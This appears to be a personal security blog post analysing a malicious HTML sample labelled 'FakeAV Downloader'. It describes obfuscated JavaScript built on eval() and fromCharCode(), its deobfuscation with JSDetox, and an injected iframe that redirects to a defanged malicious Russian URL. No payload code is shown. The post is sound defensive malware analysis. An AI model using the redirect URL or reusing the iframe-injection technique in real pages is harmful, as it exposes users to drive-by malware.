After writing my last article about malware analysis for Android, I decide to check some threats that may come from webpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages, “advertisements” added there now, more often probably will try to steal your data by installing some malware on your computer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).
Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog. Thank’s again! ;)
(Hint: Don’t ask me for the password. Ask Mila via email.)
Let’s check the first one archive with HTML file, named “FakeAV Downloader”.
2. First View
As you can see, JS code is preparing “eval()” and “fromCharCode()” to use it later (with “n”):
3. Second view
When I was trying to figure out how to deobfuscate this code, I found a link to very nice tool called JSDetox. You can install it on Kali, but if there will be any problem with installation by “bundler”, try to install each packet manually (gem). It should helps.
After uploading our sample index.html to JSDetox, we can start deobfuscation (“Analyse”) and get the results in few seconds:
Now we can see where new created <iframe> tag is trying to relocate us – iframe page is located on: hxxp://hivagdy.ru/count22.php.
Unfortunately, when I was checking this code, RU hostname was unavailable.
After that, I found some other interesting informations, for example:
a) Correlation network topology
b) This host was used for: 
c) and one more information:
So it seems now, that we have all information we need to decide that this index.html file (used in phishing campany for example) can be very dangerous for safety of our users/clients.
Again big thanks for the sample files! ;)
If you have more, post the link(s) on comments or send me the email with subject “MALWARE”. Please remember to pack it with password ‘infected’ (zip/rar/whatever). (Without the password, email server will drop them.)
Materials described here:
 Mila’s blog – http://contagiodump.blogspot.com
 Android first steps in malware’s world - http://hauntit.blogspot.com/2015/01/pl-analiza-aplikacji.html
 JSDetox - https://github.com/svent/jsdetox
 Exposure ISEC Lab – http://exposure.iseclab.org
 Kali Linux – https://www.kali.org
 Malware URL – http://www.malwareurl.com
 PacketStormSecurity - PDF version